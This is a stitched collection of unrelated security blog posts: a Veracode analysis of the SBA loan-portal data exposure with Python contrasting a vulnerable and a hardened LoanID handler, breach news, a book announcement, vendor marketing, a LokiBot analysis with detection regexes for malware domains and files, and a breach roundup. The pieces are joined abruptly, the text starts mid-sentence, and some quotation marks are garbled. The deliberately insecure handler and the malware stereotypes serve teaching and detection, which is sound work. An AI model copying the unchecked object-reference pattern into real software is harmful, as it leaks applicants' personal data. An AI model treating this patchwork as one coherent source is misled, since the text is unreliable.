This has, foreseeably, led to thousands of loan applications for the Small Business Administration (SBA) in the United States, placing an overwhelming demand on the Economic Injury Disaster Loan Emergency (EIDL) program. The program currently provides up to $10,000 in financial assistance to small businesses suffering financial loss from the pandemic, but has unfortunately come with a security risk for some applicants seeking loans in order to maintain their business health.

During the recent influx of loan applications, the SBA acknowledged that the personal information of nearly 8,000 business owners might have been exposed to others accessing the program online. The flaw in the program simply required a user to hit the “back” button while in the loan application portal, which in some cases may have shown sensitive information belonging to another applicant.

Possible causes of the SBA flaw

While we can’t be certain which flaw is plaguing the SBA loan application system, we can make an educated guess based on similar behavior we’ve seen. Jamie Rougvie, a member of Veracode’s Manual Penetration Testing team, believes this flaw may be a combination of redirects and access control misconfigurations. Here is how this flaw may have impacted the SBA loan application process:

The Flaw

A company signs up to the loan portal and is given a unique identity relating to that loan. Let’s say “Company A” signs up and gets a LoanID of 1. “Company A” then signs into the application and starts to fill in the application form. They then notice that they made a mistake on the previous page, so they click the back button within the application.

This back button then redirects them to the previous page. Now, let’s assume the code behind the button redirects them to the following URL: https://www.URL.com/application?LoanID=2 (it should be noted that on the loan site this would be more complex than a hard-coded URL). We would assume that the value may be coming from a variable which is being dynamically changed based on a number of factors.

You can see here the LoanID has changed from 1 to 2. This means that instead of showing “Company A” data, it will attempt to show the data of LoanID 2, which is “Company B.”

What should happen here is when ???Company A??? is redirected, a check should be done to make sure they have permission to access the page that they are being redirected to. If they have permissions to access the page, the redirect occurs. If they do not have permissions to access the page, either an error is displayed, or they are redirected elsewhere.

It seems like in this case no checks were performed on the request, and as such “Company B’s” data was displayed to “Company A”, meaning sensitive PII was leaked on the webpage.

It’s not clear if “Company A” only had access to “Company B’s” data, or if this data changed each time a new request was made via the back button. This would mean that each time the back button was pressed, another company’s data would be leaked to a standard user. If an attacker found this type of flaw, they could within a small amount of time be able to obtain PII information of all companies in the loan application.
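The access-control gap described above, modelled in Python as an added example (this is not the SBA's or Veracode's code). A page handler trusts the LoanID taken from the URL, so any logged-in user can read any loan; the hardened handler beside it ties the LoanID back to the company on the server-side session, and the back-button redirect takes its target from the session rather than from the client-supplied URL. The loan records, the session table, the AUDIT_LOG list and the URL shape https://www.URL.com/application?LoanID=N are all constructed for the illustration.

```python
"""Vulnerable vs. hardened handling of a LoanID object reference.

Constructed example: the loan store, session store and audit log below are
in-memory stand-ins for whatever the real portal used.
"""
from dataclasses import dataclass
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Constructed sample data: two companies, each with one loan record holding PII.
LOANS = {
    1: {"company": "Company A", "ssn": "***-**-0001"},
    2: {"company": "Company B", "ssn": "***-**-0002"},
}

# Hypothetical session store: session cookie value -> authenticated company.
SESSIONS = {
    "sess-a": "Company A",
    "sess-b": "Company B",
}

# Constructed audit trail so that mismatched LoanIDs are recorded for detection.
AUDIT_LOG: list[str] = []


@dataclass
class Response:
    status: int
    body: Optional[dict] = None
    location: Optional[str] = None  # set for 302 redirects


def vulnerable_application_page(session_id: str, loan_id: int) -> Response:
    """Mirrors the suspected flaw: the LoanID from the URL is used as-is.
    Authentication is checked, but authorization (does this loan belong to
    this company?) is not, so changing the number reads another applicant."""
    if session_id not in SESSIONS:
        return Response(401)
    loan = LOANS.get(loan_id)
    if loan is None:
        return Response(404)
    return Response(200, body=loan)


def secure_application_page(session_id: str, loan_id: int) -> Response:
    """Hardened version: the loan must belong to the company on the session.
    'Not found' and 'not yours' return the same 404 so the response does not
    confirm which LoanIDs exist."""
    company = SESSIONS.get(session_id)
    if company is None:
        return Response(401)
    loan = LOANS.get(loan_id)
    if loan is None or loan["company"] != company:
        AUDIT_LOG.append(f"denied: session={session_id} LoanID={loan_id}")
        return Response(404)
    return Response(200, body=loan)


def secure_back_redirect(session_id: str, requested_url: str) -> Response:
    """Hardened back-button handling: the redirect target is derived from the
    server-side session, never from the client-supplied URL. A LoanID in the
    request that differs from the session's own loan is logged, not honoured."""
    company = SESSIONS.get(session_id)
    if company is None:
        return Response(401)
    own_ids = [lid for lid, rec in LOANS.items() if rec["company"] == company]
    if not own_ids:
        return Response(404)
    target = own_ids[0]
    sent = parse_qs(urlparse(requested_url).query).get("LoanID", [None])[0]
    if sent is not None and sent != str(target):
        AUDIT_LOG.append(f"mismatch: session={session_id} asked for LoanID={sent}")
    return Response(302, location=f"https://www.URL.com/application?LoanID={target}")


if __name__ == "__main__":
    # Company A asks for LoanID 2 through both handlers.
    print("vulnerable:", vulnerable_application_page("sess-a", 2))
    print("secure:    ", secure_application_page("sess-a", 2))
    print("redirect:  ", secure_back_redirect("sess-a", "https://www.URL.com/application?LoanID=2"))
    print("audit:     ", AUDIT_LOG)
```

The ownership check is the single line that separates the two page handlers; the redirect handler shows the second half of the fix, which is to stop letting a client-controlled parameter decide where a redirect lands. Recording the mismatches gives the SOC something to alert on if a session starts walking through LoanIDs.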

The seriousness of this issue depends on the type of application, and the information that is disclosed via the vulnerability. “In an application like a loan website where the vast amount of information would be sensitive, this would be a critical severity issue and we would jump on call with the customer straight away to discuss the problem,” Jamie further explains.

The SBA loan application issue potentially exposes sensitive information like an applicant’s name, Social Security Number, tax identification number, address, date of birth, financial insurance information, and more, which means a threat actor could then take that information and use it in any number of additional threats, like social engineering attacks or potential identity theft.

That’s why it’s important to stay one step ahead. Situations that entail building applications or websites quickly to amplify communication and provide services are not unique to current events; they should always involve security measures like regular scans and testing procedures. “When you combine the power of Veracode automation tools and our MPT (Manual Penetration Testing) services, these types of issues can be identified early on and can be mitigated before pushing the application into production,” Jamie explains.

Being proactive instead of reactive will set your organization up for preventative security measures so that you’re not faced with the cleanup that comes from worrisome vulnerabilities like IDOR and Session Management flaws.

Reducing risk with healthy AppSec

Cyberattacks and security threats are on the rise, which only amplifies vulnerabilities like the one we saw from the SBA in early April. Ultimately, this combination of rapid digital acceleration, and an uptick in cyberattacks, has left many organizations vulnerable. This situation stems in part from organizations adopting reactive, rather than preventative, security strategies.

What does preventative AppSec look like? Companies that are concerned about the health of their applications should scan early and scan often to identify problems before an issue arises. The mentality of shifting security left, bringing it into the development process sooner rather than later, can save money and time down the road. It helps eliminate security debt, too, which piles up over time and is carried as a constant risk from project to project.

Data from our 10th annual State of Software Security Report (SOSS) shows that when organizations scan their code frequently (more than 300 times a year), they carry five times less security debt than those that scan the least.

Having a suite of SaaS solutions in the cloud to scan application code is essential for remote teams, but even more so today with entire companies going digital. Veracode’s application security solution combines five analysis types in one for a comprehensive look at your code as developers work. Every step of the way in the software development cycle (SDLC), from the IDE to production, these scans ensure that your team is working smartly and efficiently to produce secure applications and stay ahead of potential issues.

And with hands-on training tools like Security Labs, developers are better equipped to write secure code, saving their organization from needing to remediate flaws down the road. Using Security Labs, software developers can exploit and fix an application in a contained environment with fast feedback, helping them learn in the languages that they need to know inside and out. Not only does it help developers satisfy compliance requirements, but also, they walk away with the training and skills needed to write more secure code and remediate flaws faster.

You don’t have to compromise between the race for swift deployment and the need for better application security. With the right tools and training, your organization and your team of developers will be well-equipped to handle what comes next as more of the world continues to take on a digital transformation and new security threats emerge.

Government investigates data breach revealing details of 774,000 migrants

Guardian Australia on Sunday revealed SkillSelect app allowed users to see partial names of applicants for skilled visas

The home affairs and employment departments are investigating a data breach revealing the personal details of 774,000 migrants and people aspiring to migrate to Australia, despite playing down the seriousness of the breach.

On Sunday, Guardian Australia revealed the government’s SkillSelect app allowed users to see unique identifiers of applicants for skilled visas, including partial names, which could then be used through searches with multiple filters to reveal other information about applicants.

Related: Immigrants don't take Australian jobs. They create jobs for others | Jock Collins


New Book! The Best of TaoSecurity Blog, Volume 1



I'm very pleased to announce that I've published a new book!

It's The Best of TaoSecurity Blog, Volume 1: Milestones, Philosophy and Strategy, Risk, and Advice. It's available now in the Kindle Store, and if you're a member of Kindle Unlimited, it's currently free. I may also publish a print version. If you're interested, please tell me on Twitter.



The book lists at 332 pages and is over 83,000 words. I've been working on it since last year, but I've used the time in isolation to carry the first volume over the finish line.

The Amazon.com description says:

Since 2003, cybersecurity author Richard Bejtlich has been writing posts on TaoSecurity Blog, a site with 15 million views since 2011. Now, after re-reading over 3,000 posts and approximately one million words, he has selected and republished the very best entries from 17 years of writing.

In the first volume of the TaoSecurity Blog series, Bejtlich addresses milestones, philosophy and strategy, risk, and advice. Bejtlich shares his thoughts on leadership, the intruder's dilemma, managing burnout, controls versus assessments, insider versus outsider threats, security return on investment, threats versus vulnerabilities, controls and compliance, the post that got him hired at a Fortune 5 company as their first director of incident response, and much more.

He has written new commentaries to accompany each post, some of which would qualify as blog entries in their own right. Read how the security industry, defensive methodologies, and strategies to improve career opportunities have evolved in this new book, written by one of the authors who has seen it all and survived to blog about it.

Finally, if you're interested in subsequent volumes, I have two planned.


I may also have a few other book projects in the pipeline. I'll have more to say on that in the coming weeks.

If you have any questions about the book, let me know. Currently you can see the table of contents via the "Look Inside" function, and there is a sample that lets you download and read some of the book. Enjoy!

Future-Proofing Your AppSec With Veracode SaaS Solutions

Global events that force the world to go digital can put business needs into perspective, and fast. We’ve been impressed by how our customers are hitting the work-from-home curveball; with a little ingenuity and some help from Veracode solutions, their businesses are carrying on. In fact, our Static Analysis scan numbers reached an all-time high in March, and then again in April. That tells us our customers are buckling down, concentrating on software security, and making sure they are there for their customers, too.

Organizations around the globe are continuing to put customers first, even when unexpected and sudden shifts change the way the world works. We’re proud of that same business continuity at Veracode, helping our customers start, improve, or expand AppSec programs in order to thrive in a digitally transformed world. The best part? It doesn’t have to be a complicated process that disrupts everyday business needs.

Get started swiftly and securely

Now more than ever, it’s vital that installation processes are fast and seamless. If your organization can start scanning from day one without worrying about manual patching or updating down the road, that means you can hit the ground running with peace of mind for the future. It’s simple to get started with Veracode and provision access to begin using our SaaS solutions in the cloud. You can set off securing your applications right away without halting projects or missing tight deadlines. That’s the way AppSec should be.

Our comprehensive offering is built for scale so that you don’t have to miss the opportunity to deploy the secure software your customers rely on. And with a wide range of SaaS products (including Static Analysis, Dynamic Analysis, Software Composition Analysis, Security Labs, and IAST) there’s minimal to no installation needed across the board when you’re ready to ramp up production with Veracode.

Scale up, scale down, and save money

For businesses on top of their digital transformation, having a healthy SaaS AppSec solution at their fingertips means staying innovative and shipping secure code on time. Our solutions integrate directly into your SDLC, with scalable offerings like automated testing that won’t get in the way of the work your developers are already doing.

In addition, accessing all application analysis types through one solution streamlines testing and reporting too, which means it’s easy to stay on top of goal setting and progress, while guiding development teams on which flaws to target first. Veracode conveniently combines all testing types (Static Analysis, Dynamic Analysis, Software Composition Analysis, and Pen Testing) in one place for easy access, covering web and mobile apps as well as microservices in most major programming languages.

Secure your applications anywhere, anytime

Since these powerful solutions are cloud-based, development and security teams collaborating around the world can keep pace with competitors in the digital go-to-market race. The ability to work from anywhere is essential for many businesses, especially today. You can access Veracode's tools and solutions without bogging down your VPN's server, reducing the risk that comes from potential breaches and cyberattacks no matter where you are in the world. If you're working from home as a lot of us are right now, that's a gamechanger for efficiency.

Whether you're looking for ways to ramp up your security or you simply want to expand your existing solutions, no matter what's happening out there in the world, Veracode is here to help. Tune in to our webinar for a deep dive into maintaining business continuity and controlling AppSec costs during turbulent times.

Cyber Threats Observatory Gets Improvements

Today I am happy to announce a big improvement in the threats observatory (available here). The main improvement is the introduction of clustering stereotypes for each tracked malware family across three different behaviours: Domains, Files and Processes.

Every malware sample performs specific actions in the domain, file and process realms: it contacts several domain names, spawns specific processes and eventually saves files on disk (file-less malware is a separate topic here). Collecting everything produced by their execution and clustering it on string similarity highlights several stereotypes that are interesting for further study or for similarity-based blocking lists. The following image shows the current deployment state.

Screenshot: Cyber Threats Observatory

What you find

According to the shared information, the Cyber Threats Observatory Dashboard is composed of the following sections:

  • Malware Families Trends. Detection distribution over time; in other words, the time-frames in which specific families are most active compared to others.
  • Malware Families. Automatic Yara rules classify samples into families. Many samples are not classified into a family: this happens when no signature matches the sample, or when multiple family signatures match the same sample. In both cases I am not sure which family the sample belongs to, so it is classified as “unknown” and not visualized on this graph. The missing slice of the pie is attributed to “unknown”.
  • Distribution Types. Based on the file's magic bytes, this graph tracks the percentages of file types that malware used as carrier.
  • Threat Level Distribution. From 0 to 3, increasingly dangerous. It would be interesting to understand the threat level of unknown families as well, in order to see whether malware or false positives hide among the unknown families. For that reason a dedicated graph named Unknown Families Threat Level Distribution has been created.
  • Stereotypes. Studying stereotypes is useful for analysing similarities within clusters; in other words, it shows the patterns used by malware in domain names, file names and process names. This matters for detection and even for preemptive blocking. Due to the vast amount of data, only the most recent 10000 entries are included.
  • TOP domains, TOP processes and TOP File Names. With a sliding window of the last 300 analyzed samples, the backend extracts the TOP (in terms of frequency) contacted domains, spawned processes and utilized file names. Again, there is no filter and no post-processing analysis on those fields, meaning you could well find “google.com” or “microsoft update” as the TOP domain, which is fine: if the sample queried them before performing its malicious intent, that is simply recorded and brought to your attention. The same goes for processes and file names. Indeed, those fields include the term “involved” in their title: if something is involved it does not mean that it is malicious, but that it has been seen in a malicious chain.
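As an added illustration (my code, not the observatory's backend), the following Python sketches the two mechanisms the list above describes: clustering strings into stereotypes by similarity, and extracting the TOP involved names over a sliding window of the last 300 samples. The observations are constructed, and the greedy difflib-based clustering with a 0.8 threshold is an assumption standing in for whatever the real backend does.

```python
import re
from collections import Counter, OrderedDict
from difflib import SequenceMatcher

# Constructed sample observations (not real observatory data). Each record is
# (sample_id, realm, value) in analysis order, as a sandbox would emit it.
OBSERVATIONS = [
    ("s01", "domain", "broken1.cf"),
    ("s01", "domain", "google.com"),
    ("s01", "file", r"C:\Users\u\AppData\Local\Temp\tmpA1B2.tmp"),
    ("s01", "process", "explorer.exe"),
    ("s02", "domain", "broken2.cf"),
    ("s02", "domain", "google.com"),
    ("s02", "file", r"C:\Users\u\AppData\Local\Temp\tmp9F3C.tmp"),
    ("s02", "process", "spoolsv.exe"),
    ("s03", "domain", "broken7.cf"),
    ("s03", "domain", "frenchman.icu"),
    ("s03", "file", r"C:\Users\u\AppData\Roaming\a7.lck"),
    ("s03", "process", "explorer.exe"),
    ("s04", "domain", "update.microsoft.com"),
    ("s04", "file", r"C:\Users\u\AppData\Roaming\k2.lck"),
    ("s04", "process", "spoolsv.exe"),
]

_DIGITS = re.compile(r"\d+")


def normalize(value):
    """Lower-case and collapse digit runs, so broken1.cf and broken2.cf
    share the template broken<n>.cf before similarity is measured."""
    return _DIGITS.sub("<n>", value.lower())


def cluster_stereotypes(values, threshold=0.8):
    """Greedy single-pass clustering on string similarity (my approximation
    of the dashboard's clustering, not its actual algorithm).

    Returns an ordered mapping: stereotype (template of the first member,
    acting as cluster representative) -> list of raw members. A value joins
    the first cluster whose representative scores at least `threshold`
    under difflib's ratio; otherwise it founds a new cluster.
    """
    clusters = OrderedDict()
    for raw in values:
        template = normalize(raw)
        for rep in clusters:
            if SequenceMatcher(None, rep, template).ratio() >= threshold:
                clusters[rep].append(raw)
                break
        else:
            clusters[template] = [raw]
    return clusters


def stereotypes_for(observations, realm, limit=10000, threshold=0.8):
    """Stereotypes of one realm (domain/file/process) over the most recent
    `limit` entries, mirroring the dashboard's 10000-entry cap."""
    recent = [v for _, r, v in observations if r == realm][-limit:]
    return cluster_stereotypes(recent, threshold)


def top_involved(observations, realm, window=300, n=5):
    """TOP values by frequency across the last `window` analyzed samples.

    Deliberately unfiltered: a benign name such as google.com is reported
    when samples contacted it, which is why the dashboard says "involved"
    rather than "malicious".
    """
    ordered_ids = list(OrderedDict.fromkeys(s for s, _, _ in observations))
    recent_ids = set(ordered_ids[-window:])
    counts = Counter(v for s, r, v in observations
                     if s in recent_ids and r == realm)
    return counts.most_common(n)


if __name__ == "__main__":
    for realm in ("domain", "file", "process"):
        print(f"== {realm} stereotypes ==")
        for rep, members in stereotypes_for(OBSERVATIONS, realm).items():
            print(f"  {rep}  <- {len(members)} member(s)")
        print(f"== TOP involved {realm}s ==", top_involved(OBSERVATIONS, realm))
```

On the constructed input the three broken<number>.cf domains collapse into one stereotype while google.com, being the only name contacted by two samples, comes out as the TOP involved domain, exactly the kind of unfiltered result the list above warns about.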

A simple example

Let's assume we want to investigate LokiBot. According to any.run: Lokibot, also known as Loki-bot or Loki bot, is an information stealer malware that collects data from most widely used web browsers, FTP, email clients and over a hundred software tools installed on the infected machine.

But let's start digging into the Cyber Threats Dashboard and see what we can find. First of all, from the Malware Families section we see the overall detection rate. Today, we might easily say that LokiBot has a low detection percentage, 0.32388, compared to families such as GandCrab, Emotet or TrickBot.

Malware Families

From the Family Distribution Over Time section (the following image) we can see the detection distribution rate. By deselecting the unwanted malware families it is possible to track the distribution of the desired one (in our case LokiBot) over time. In the following case all families except LokiBot have been disabled (by clicking on the malware name directly in the graph legend). We can see a compelling increase in LokiBot detections on 2020-04-28 and from 2020-04-30 to 2020-05-02. It looks to be the most active observed period for this well-documented family during 2020. This observation fits the public mainstream information perfectly: many security magazines and many vendors observed such an increase as well, mostly spread over COVID-19 malspam, for example: SecurityAffairs, BankInfoSecurity, ThreatPOST, FortiNet.

Families Distribution Over Time

Digging a little into the specific case, we can observe the domain stereotypes. It's interesting to see that many domain stereotypes (in other words, the representatives of a wide set of similar domains) have .cf (Central African Republic) as Top Level Domain, and some of them are quite similar: broken1.cf, broken2.cf, and so on. Something not very original to block, such as: broken<number>.cf

LokiBot Domain Stereotypes as of 2020-05-02

Following on in the diagram we can observe one more domain stereotype with the .icu TLD, in particular frenchman.icu (a generic TLD targeting entrepreneurs and business owners), and further along the same path one more domain stereotype under .co.ke (Kenya). Now let's focus a little on “Files” and check whether there are patterns in the “File” section, in the following diagram.

LokiBot File Stereotypes as of 2020-05-02

The linearity of the composition (every stereotype gets the same score, in this case 3) suggests the malware uses the different groups of files equally, meaning that once it starts on a victim machine it reads/creates/writes every single file at least once per run. We can see a nice pattern in the temporary file names, but it won't help us in detection since it is the default Windows temporary file pattern. However, we might associate the presence of such temporary files with the direct usage of spoolsv.exe, mrsys.exe and even explorer.exe. Even if many false positives could be triggered, it would be nice to give it a try and see where it takes us!

Most interesting is the presence of a specific file, ([a..z][0.9]).lck, which would be a nice key point to check for (using file detection).
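To show how the stereotypes found above could be turned into detection logic while keeping the post's caveat that “involved” is not “malicious”, here is an added example (my code, not the author's tooling). The regexes are my reading of the informal broken<number>.cf and ([a..z][0.9]).lck notation (one letter followed by one digit), the process list is the one named above, the sandbox reports are constructed, and the scoring weights are an assumption.

```python
import re

# Stereotype patterns lifted from the LokiBot observations discussed above.
# The regexes are my encoding of the page's informal notation (assumption).
DOMAIN_STEREOTYPES = {
    "broken<n>.cf": re.compile(r"^broken\d+\.cf$", re.IGNORECASE),
}
FILE_STEREOTYPES = {
    "[a-z][0-9].lck": re.compile(r"(?:^|[\\/])[a-z][0-9]\.lck$", re.IGNORECASE),
}
# Processes the text associates with the temp-file pattern. On their own they
# are only "involved": explorer.exe and spoolsv.exe run on every Windows box.
INVOLVED_PROCESSES = {"spoolsv.exe", "mrsys.exe", "explorer.exe"}
# Default Windows temporary-file naming; not discriminative by itself.
WINDOWS_TEMP = re.compile(r"[\\/]temp[\\/]tmp[0-9a-f]{4}\.tmp$", re.IGNORECASE)


def evaluate(report):
    """Score one sandbox report (dict with 'domains', 'files', 'processes').

    Strong signals (stereotype hits) add 2 points each; the weak
    temp-file + involved-process combination adds 1 (assumed weights).
    Returns (verdict, reasons): 'alert' at >= 2, 'review' at 1, else 'none'.
    """
    reasons, score = [], 0
    for name, pattern in DOMAIN_STEREOTYPES.items():
        hits = [d for d in report.get("domains", []) if pattern.search(d)]
        if hits:
            reasons.append(f"domain stereotype {name}: {', '.join(hits)}")
            score += 2
    for name, pattern in FILE_STEREOTYPES.items():
        hits = [f for f in report.get("files", []) if pattern.search(f)]
        if hits:
            reasons.append(f"file stereotype {name}: {', '.join(hits)}")
            score += 2
    temp_hits = [f for f in report.get("files", []) if WINDOWS_TEMP.search(f)]
    involved = {p.lower() for p in report.get("processes", [])} & INVOLVED_PROCESSES
    if temp_hits and involved:
        reasons.append("temp files with involved process(es): " + ", ".join(sorted(involved)))
        score += 1
    verdict = "alert" if score >= 2 else "review" if score == 1 else "none"
    return verdict, reasons


# Constructed reports (not real sandbox output).
LOKI_LIKE = {
    "domains": ["google.com", "broken3.cf"],
    "files": [r"C:\Users\u\AppData\Local\Temp\tmp4D1E.tmp",
              r"C:\Users\u\AppData\Roaming\q4.lck"],
    "processes": ["explorer.exe", "spoolsv.exe"],
}
# Ordinary desktop activity: default temp file plus explorer.exe only.
BENIGN_DESKTOP = {
    "domains": ["update.microsoft.com"],
    "files": [r"C:\Users\u\AppData\Local\Temp\tmp8A2B.tmp"],
    "processes": ["explorer.exe"],
}
# Lookalikes that do not fit either stereotype: no digits in the domain,
# two letters and two digits in the lock file name.
NEAR_MISS = {
    "domains": ["broken.cf"],
    "files": [r"C:\Users\u\AppData\Roaming\ab12.lck"],
    "processes": ["notepad.exe"],
}

if __name__ == "__main__":
    for label, report in (("loki-like", LOKI_LIKE), ("desktop", BENIGN_DESKTOP),
                          ("near-miss", NEAR_MISS)):
        verdict, reasons = evaluate(report)
        print(f"{label}: {verdict} {reasons}")
```

The temp-file rule alone can only raise a report to “review”, which is the practical consequence of the false-positive concern in the paragraph above: the default Windows temporary name plus a ubiquitous process is evidence of involvement, not of malice, until a stereotype hit corroborates it.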

Conclusion

In this post I've introduced a big improvement of the Cyber Threat Observatory, showing a quick and dirty analysis of LokiBot through stereotypes. The aim of this project is not to give detailed analyses of malware but rather to focus on general patterns and macro stereotypes in order to perform massive data analysis.

Hope you find it useful; if so, please share it with your fellows.

Cyber Security Roundup for May 2020

A roundup of UK-focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, April 2020.

As well reported, UK foreign exchange firm Travelex's business operations were brought to a standstill after its IT systems were severely hit by the Sodinokibi ransomware at the start of the year. It was reported that the REvil group were behind the attack and had stolen 5Gbs of customer personal data, then demanded $6 million (£4.6m) in ransom. The Wall Street Journal reported in April 2020 that Travelex had reached a deal, paying $2.3 million (£1.84m) in Bitcoin to the cybercriminals. This sort of response incentivises future ransomware activity against all other businesses and could lead to an inflation of future cyber-extortion demands, in my opinion.

Cognizant, a large US digital solutions provider and IT consultancy, was reportedly hit by the Maze ransomware. Maze, previously known as the 'ChaCha' ransomware, like the Travelex attack not only encrypts victims' files but steals sensitive data from the IT systems as well, enabling the bad guys to threaten to publish the stolen data unless the organisation coughs up to their cyber-extortion demands; so the bad guys are very much rinsing and repeating lucrative attacks.

Microsoft wrote an excellent blog covering the 'motley crew' of ransomware payloads. The blog covers ransomware payloads said to be straining security operations, especially in health care; Microsoft warned security teams, urging them to look for the signs of credential theft and lateral movement activity that herald attacks.

Researchers continue to be busy exposing large sensitive datasets within misconfigured cloud services. In April researchers reported 14 million Ring user details exposed in a misconfigured open AWS database, fitness software Kinomap had 42 million user details exposed in another misconfigured database, and Maropost had 95 million users exposed, also in a misconfigured database.

Nintendo confirmed 160,000 of its users' accounts had been accessed, exposing PII and Nintendo store accounts. The gaming giant said that from April its users' accounts were accessed through the Nintendo Network ID (NNID), which is primarily used for Switch gaming. The company is unaware exactly how the intrusion occurred, saying it “seems to have been made by impersonating login to Nintendo Network ID”. “If you use the same password for your NNID and Nintendo account, your balance and registered credit card / PayPal may be illegally used at My Nintendo Store or Nintendo eShop. Please set different passwords for NNID and Nintendo account,” Nintendo said. In response to these issues the company has abolished users' ability to log into their Nintendo account via NNID, passwords for both NNID and Nintendo accounts are being reset, and the company is recommending multi-factor authentication be set up for each account.

The account breaches weren't the only cyber issue affecting Nintendo in April: it was reported that a bot, dubbed 'Bird Bot', was used by a reseller to buy up Nintendo Switches before customers could make their Switch purchase from Nintendo. The bot benefits the reseller at the expense of consumers: by buying up all available Switches directly from Nintendo, they are able to sell them on at higher prices, making a quick and tidy profit thanks to the current high demand for Switches and lack of supply.

April was a busy month for security updates: Microsoft released security patches fixing 113 vulnerabilities on Patch Tuesday and an out-of-band patch for Teams found by researchers at CyberArk. Patch Tuesday was a quiet one for Adobe, though it released fixes for 21 critical vulnerabilities in Illustrator and Bridge at the end of the month. Oracle released a huge 397 fixes for 450 CVEs in over 100 products, which I think is a new record for a patch release!

Sophos said it and its customers were attacked when a previously unknown SQL injection vulnerability in its physical and virtual XG Firewall units was exploited. “The attack affected systems configured with either the administration interface (HTTPS admin service) or the user portal exposed on the WAN zone. In addition, firewalls manually configured to expose a firewall service (e.g. SSL VPN) to the WAN zone that shares the same port as the admin or User Portal were also affected,” Sophos said.

There were security-critical patch releases for Mozilla Firefox, Chrome (twice), and for 8 Cisco products. A bunch of VMware patches followed, including one for a vulnerability scoring CVSS 10 (the highest possible) in vCenter, a critical one in vRealize Log Insight and a critical cross-site scripting vulnerability in ESXi 6.5 and 6.7. And finally, on the patch front, Intel decided to discontinue multiple products, as it was unable to keep up with patching their vulnerabilities.

Stay safe, stay home and watch out for the scams.
